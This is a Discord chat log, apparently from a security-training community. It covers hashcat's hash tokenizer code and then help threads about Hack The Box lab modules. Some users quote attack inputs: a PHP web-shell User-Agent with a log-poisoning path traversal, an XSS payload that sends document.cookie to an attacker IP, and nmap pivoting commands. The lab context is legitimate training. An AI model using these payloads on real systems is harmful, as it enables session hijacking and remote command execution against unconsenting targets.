  token.len_min[2] = 0;
  token.len_max[2] = 45;
  token.attr[2]    = TOKEN_ATTR_VERIFY_LENGTH;

  // lm response
  token.sep[3]     = ':';
  token.len_min[3] = 0;
  token.len_max[3] = 48;
  token.attr[3]    = TOKEN_ATTR_VERIFY_LENGTH
                   | TOKEN_ATTR_VERIFY_HEX;

  // ntlm response
  token.sep[4]     = ':';
  token.len[4]     = 48;
  token.attr[4]    = TOKEN_ATTR_FIXED_LENGTH
                   | TOKEN_ATTR_VERIFY_HEX;

  // challenge
  token.sep[5]     = ':';
  token.len[5]     = 16;
  token.attr[5]    = TOKEN_ATTR_FIXED_LENGTH
                   | TOKEN_ATTR_VERIFY_HEX;

this is the tokenizer code for NetNTLMv1

you can see how each part of the hash is broken down on it's own

Ok yeah

and has it's own token attributes for validation

i can see how it can get crazy to be specific for certain things

so like, if the LM response token is the wrong length or wrong encoding

how do we raise that JUST that token is wrong?

currently, we check the tokenizer as a whole

so it's difficult

and it makes sense to do that tbh

so it will only throw hash length exception when it's not being broken down, like raw hashes

typically, when theres only 1 token, or the tokens are ignored mostly

because each different hash type has it's own lengths and/or tokenization

neat

static const char *SIGNATURE_KRB5PA = "$krb5pa$23$";
[...]
  token.token_cnt  = 6;

  token.signatures_cnt    = 1;
  token.signatures_buf[0] = SIGNATURE_KRB5PA;

  token.len[0]     = 11;
  token.attr[0]    = TOKEN_ATTR_FIXED_LENGTH
                   | TOKEN_ATTR_VERIFY_SIGNATURE;

  token.sep[1]     = '$';
  token.len_min[1] = 0;
  token.len_max[1] = 64;
  token.attr[1]    = TOKEN_ATTR_VERIFY_LENGTH;

  token.sep[2]     = '$';
  token.len_min[2] = 0;
  token.len_max[2] = 64;
  token.attr[2]    = TOKEN_ATTR_VERIFY_LENGTH;

  token.sep[3]     = '$';
  token.len_min[3] = 0;
  token.len_max[3] = 128;
  token.attr[3]    = TOKEN_ATTR_VERIFY_LENGTH;

  token.len[4]     = 72;
  token.attr[4]    = TOKEN_ATTR_FIXED_LENGTH
                   | TOKEN_ATTR_VERIFY_HEX;

  token.len[5]     = 32;
  token.attr[5]    = TOKEN_ATTR_FIXED_LENGTH
                   | TOKEN_ATTR_VERIFY_HEX;

you can see here that we dont check just lengths and encoding

in this case we check the "signature" as well

to easily ID the hash type

i assume that hash type/signature is what the check does when you're confused on which mode to use and you pray it works

so Autodetect is special

we run the ENTIRE tokenizer process

for EVERY module

But how often is really just one token wrong? I would assume that error pops up if someone tries to use the wrong hashformat or copied it wrong and in that case would a error like „you tried cracking hash x that usually has the format ‚username:xxxxx:yyyyy‘ but your format is ‚username:xxxxx‘ please fix“ not help more?

and spit out the ones that didnt error

lol

oh interesting

more often than you'd think unfortunately

that's chaotic and I love it

I've never used autodetect for hashcat

the only way we could make autodetect even remotely accurate

was to step through everything

and even then, its still essentially a VERY fancy regex

Me neither, always search for the hash type

but it works™️

if i'm confused on it then i'll autodetect and pray

or throw it at john and be like "lol good luck have fun"

I always dig through example hashes and compare those with what I have

if I'm not sure

The example_hashes page hasn't let me down yet

because i know in essence that most hash signatures are at the start

to be fair

i ALSO dig through the example hashes page

long before i try to autodetect

so there's that haha

I'm doing it right

it just depends on how much i'm already frustrated

I'm still having problems 😦 Can someone dm me ?

and if someone messes up renewing ssl hashcat --example_hashes

😛

but yes

surely that won't ever happen again

we do have that as well

and, much like the autodetect

that examples output and the help output are dynamic

it goes and gets those from every module present

meaning if you load in a custom plugin/module/etc.

it will appear in those outputs

as well as being considered for autodetect (assuming you didnt disable it)

that's actually cool, i didn't realize that would be dynamic

saves on having to store a ton of text in more than 1 place

what do you do for ntlmv2 when the length is not constant, skip length checking for MessageDependentFields and payload fields?

well lets see

  // username
  token.sep[0]     = ':';
  token.len_min[0] = 0;
  token.len_max[0] = 60;
  token.attr[0]    = TOKEN_ATTR_VERIFY_LENGTH;

  // unused
  token.sep[1]     = ':';
  token.len[1]     = 0;
  token.attr[1]    = TOKEN_ATTR_FIXED_LENGTH;

  // domain
  token.len_min[2] = 0;
  token.len_max[2] = 45;
  token.sep[2]     = ':';
  token.attr[2]    = TOKEN_ATTR_VERIFY_LENGTH;

  // lm response
  token.sep[3]     = ':';
  token.len[3]     = 16;
  token.attr[3]    = TOKEN_ATTR_FIXED_LENGTH
                   | TOKEN_ATTR_VERIFY_HEX;

  // ntlm response
  token.sep[4]     = ':';
  token.len[4]     = 32;
  token.attr[4]    = TOKEN_ATTR_FIXED_LENGTH
                   | TOKEN_ATTR_VERIFY_HEX;

  // challenge
  token.sep[5]     = ':';
  token.len_min[5] = 2;
  token.len_max[5] = 1024;
  token.attr[5]    = TOKEN_ATTR_VERIFY_LENGTH
                   | TOKEN_ATTR_VERIFY_HEX;

min/max based on the struct/buffer limits

Make sure you run silketw as admin and that it keeps running while you run the other command, it only logs while it’s active

challenge can be between 1 byte and 512 bytes long, encoded as 2-1024 hex characters

@maiden field

Whoops reply was off

i've done that so many times

who can help me plse

ah I see, checks for the limit

right, we just give it variable lengths

alright we're flooding this channel now with non-module related things as fun as it is to pick at the chicken's brain

yeah thank you for your time sir

Technically, with the existence of a Hashcat module, one could argue it's all related

🙂

i just mean other people have been getting drowned out

though to be fair, that module needs some... work

and every module that recommends using --force

that's probably the problem ill try that thanks

but yeah, probably best not to spam a help channel

yeaaaaah

I hear it does, I haven't done it myself to see

did you mention that you could help with writing that, would be really cool to have that

It was mostly accurate when it launched but its not been updated recently

and stuff moves real fast around here

I've just picked up not to use --force no matter how much they push it

so it got outdated fast

that'd be cool, not clue how to go about getting that done though

when you do, you're seeing like 3 or 4 levels of warnings/errors I personally put in 🙂

"this time, it's personal" 😛

Yeah, I've seen you explain it to people so many times 😁

might need to contact the academy team but I too have no idea

I might gate force behind one of our compile configs

so that normal users can't even use it

we've talked about it before but the influx of issues it'd cause would be... interesting to say the least

why is my pc emitting smoke

lol

@ivory prawn the fuck do you want?

....wow!!

i did not ask you to dm me; and if you cannot ask it here then i will assume it's illegal and decline further communication attempts

maybe read the #rules

i need help for my compiuter , i new in this sorry for bother you

unsolicited DMs are against the rules

https://tenor.com/view/do-you-have-any-idea-how-little-that-narrows-it-down-that-narrows-it-down-clear-now-its-clear-now-i-understand-now-gif-21256627

and this server isnt tech support

ask in #1024429874246590575 (and don't ping me either when you ask)

grateful , very kind

I had to put "Don't DM without asking" on my profile, it has not helped lol

it worked thanks a lot 🙂

i gave up a long time ago

i swear, i cant clear them fast enough to drop below about 30-40

can I bother here for some starting point help? I am having connectivity issues

I just hit ignore, but with you as a dev, I can't even imagine how flooded your DMs are

there are close to 7k people in just our discord

terminate machine, terminate vpn, download and change vpn connection pray

and very few active as community members

lots of 1 off people which inevitably means lots of DMs

Yeah, and when the server is yours, you don't have much of a choice

well gonna try again
I cant ask support cuz of the holidays

yuuuup

are the dms just "y dis hash no work"

tbh I haven't run into problem with hashcat which I can't fix myself

most arent even hashcat related

which idk if thats better or worse

a lot of "hack this instagram/snapchat" of course

but also a lot of very... odd requests and messages

i'm also in 100+ security servers so that doesnt help

I think that's worse

https://tenor.com/view/cin-seddi-gif-12356600

someone can help me with ATTACKING COMMON APPLICATIONS - WordPress - Discovery & Enumeration with the question "Find the version number of this plugin. (i.e., 4.5.2)"?

use the hint, check the files

it asks for a version number btw

Hello Guys, can some one help me to check something, if the problem is only on my conneciton or for the entire module: https://academy.hackthebox.com/module/67/section/2502 CITRIX Breakout

we should get on the link, to access the WIN Device BUT if go there i recive a redirect.
to : https://www.fbi.gov/how-we-can-help-you/scams-and-safety/on-the-internet

I found
akismet
contact-form-7
mail-masta
mailchimp-for-wp
wp-sitemap-page
wpdiscuz
but all of them incorrect answer

can someone give me a hand with the file inclusion log poisoning module section? Nothing seems to be working. I go to the site and use burp...intercept...then i send to repeater and change the GET to add this ||GET /index.php?language=../../../../var/log/apache2/access.log&cmd=ls+/ ||and then user agent to this ||User-Agent:<?php system($_GET['cmd']);?>|| , but i get nothing in return for the response field...any advice or tips for what i may be missing?

go to the url inside the rdp session of target

it needs version number

fuck i am lost

thank you dude 😄

guys i think it requires a version number

i no talk to u

it's clear you haven't read the #rules or #welcome

this isn't for posting jobs or job offers or anything like that my dude

your name is mr.brain but it appears you lack one

check if you can access the log first

here i'll make it easy

Hi, I still can't scan internal network with nmap, It goes over all the hosts then starts a port scan that doesn't end. I just want to see the active hosts on the network.

@next bronze so when i encode / use %2F within the URL i do as shown here

What module is this for and what's your command? Sorry, missed when you first asked

nmap through proxychains

Pivoting module on the internal network in the skill assessment lab. Ran: ||proxychains nmap -sT 172.16.5.0/24||

I don't see the log being posioned

isn't host scanning -sn

Tried it as well, it just goes over all the hosts and then performs a port scan even though it's by definition not a port scan

don't do it with -sT

don't you need st when going though proxychains

only if you're doing port scans

-sT is specifically scan tcp port

and overrides options that disable port scanning

@next bronze - ok - let me check what could be the issue

Hmm, perhaps try -Pn -sT -p88,445 $iprange, my go-to when I'm just trying to find hosts quickly in an AD environment through a proxy, then you can scan more once you find something

well yeah, you can't do ICMP over proxychains so need to fallback to port scanning to find which host is up

Trying now, thanks everyone

Would recommend ligolo

that or I usually do -Pn -sT -F -T4 so it can find linux hosts too

Easy to clear pivoting skills assessment

I'm having a problem with the module about XSS -> Session hijacking . Can anyone help me troubleshoot it? It must be a trivial thing

But then it tries scanning 100 ports instead of one and it takes so much longer, doesn't it?

Would look into it tomorrow

-F scans top 100

Sorry the top hundred

I almost got the hash for the last question in the AD skills assessment and then the pwnbox shutdown 😦

Snort Rule Development (There is a file named log4shell.pcap in the /home/htb-student/pcaps directory, which contains network traffic related to log4shell exploitation attempts, where the payload is embedded within the user agent. Enter the keyword that should be specified right before the content keyword of the rule with sid 10000098 within the local.rules file so that an alert is triggered as your answer. Answer format: [keyword]; )
I got the rule work, but HTB didn't accept my answer

-T4 reduces timeout and retries so it will be faster, but yes it will take longer compared to scanning only 2 ports

Which one did you put?

just why i can't loggin that say captcha is required and there is 0 captcha

There’s something that works better than the one you put, remember you basically want to check the user agent, so where is that one located in a http request

disable adblock

i don't have just a vpn

i already disabled the vpn and that isn't work

There is a version of captcha that automatically deduces if your behavior across the internet is non-human

Meaning, that the captcha that you've been used to see has a different version, that doesn't require you to click on the sidewalks or bridges

Got it, thank you for the hint 💖

It just tells me that all the hosts are up, which obviously they aren't. And there isn't any differente between the real active host and the fake ones

That's intended behaviour for -Pn, did the scan not finish?

And done. Great module 😄 But some parts were definitely annoying

These are the results when it finished

it will tell you host is up, but if it is really up you will see info on the ports

I found the input field vulnerable to xss, I'm able to trigger a request to script.js, but that doesn't make a request to index.php . Then I tried without passing throught script.js and make a direct request to index.php using the code provided in the module, a file cookies.txt is created with the remote IP address but no cookie session in it. Strange

Example: ```
PORT STATE SERVICE
445/tcp closed microsoft-ds

Nmap scan report for 172.16.5.242
Host is up (6.4s latency).

PORT STATE SERVICE
445/tcp closed microsoft-ds

Nmap scan report for 172.16.5.243
Host is up (2.8s latency).
PORT STATE SERVICE
445/tcp closed microsoft-ds
Nmap scan report for 172.16.5.244
Host is up (2.8s latency).

Yeah I don't have any info about them

445 feedback

What if you add --open to the command? Otherwise ngl, I'm confused, is there any chance proxychains isn't set up correctly?

but yeah

sounds like bad config

For who that are stuck here, don't put the square bracket in the answer

also keep in mind that there are 255 hosts scanned, you might need to scroll up to find the alive ones

if you don't comment out the other socks4/5 sometimes it breaks

Yeah, --open will show only open ports, otherwise might be a bad configuration

at the same time i don't recall fighting that hard with this

Checked it, the /etc/proxychains.conf contains socks4 127.0.0.1 9050 and I start the dynamic port forwarding with ssh -D 9050 and just use proxychains

I did

Is it possible that the lab is acting really really weird?

that too

Hello folks. I was wondering if anyone has worked on
Analyzing Evil With Sysmon & Event Logs for the SOC Analyst path. I am having issues with Replicate the Unmanaged PowerShell attack described in this section and provide the SHA256 hash of clrjit.dll that spoolsv.exe will load as your answer. "C:\Tools\Sysmon" and "C:\Tools\PSInject" on the spawned target contain everything you need. I cannot seem to be able to get the injection it gives working and make the spooler show how it is supposed to.

A reset is probably in order

I did reset the machine a couple times. I'm considering to just move on to AD and hope nmap behaves there. If it won't I'll have to recheck the config even though I really don't think it is the config which is very simple here

--open didn't help either?

Trying it now. Each scan takes 15 mins approximately

I did the skills assessment with ligolo-ng here but I haven't had issues with nmap through proxychains when I've used it

Yeah, nmap through proxychains is pretty slow, another reason to learn ligolo 😁

I'll look at ligolo later, sounds like a much better option

I'll at least let this scan finish, the last chance haha

Thanks for all the help! I really appreciate it

No problem

I'm putting new Image().src='http://OUR_IP/index.php?c='+document.cookie in script.js as suggested by the module. Obviously I put the ip of the server. It doesn't make a call to index.php . I don't know why. Do I need to change anything?

Dumb question but why isn't klist working?

└─$ export KRB5CCNAME=ksimpson.ccache
                                                                                                                                                                                                                                              
┌──(ruderaph㉿Rude)-[~/boxes/scrambled]
└─$ klist
Command 'klist' not found, did you mean:
  command 'mlist' from deb mblaze
  command 'flist' from deb mmh
  command 'flist' from deb nmh
Try: sudo apt install <deb name>

perhaps you don't have the kerberos thing installed

Im googling that now but i figured it would be downloaded already? i believed ive used this before on my old kali but don't rememebr downloading it.

are both files in the same web dir?

yes

WOuld it be kerberoast?

That didn't work after installing it

google debian install klist

I have a GET /script.js but not a /GET for index.php

did you start the php server

and make sure the ports are correct

I do not believe it is the IP of the server. Did you do an ip a ?

yes, I solved it. It actually was a port error this time, but I tried multiple times and I thought I wrote correctly before..strange..I also experienced a lot of network problems with this module.

glad, I finally got the flag. Thanks for your help

hi everyone im doing the intro to academy and I spawned a target ip but my browser doesnt want to show me the targets vpn key connection. any ideas? tried disabling ad blocker already.

It took me three days to do it because it kept crashing on my.

Do you have a screenshot?

i dont lemme login on kali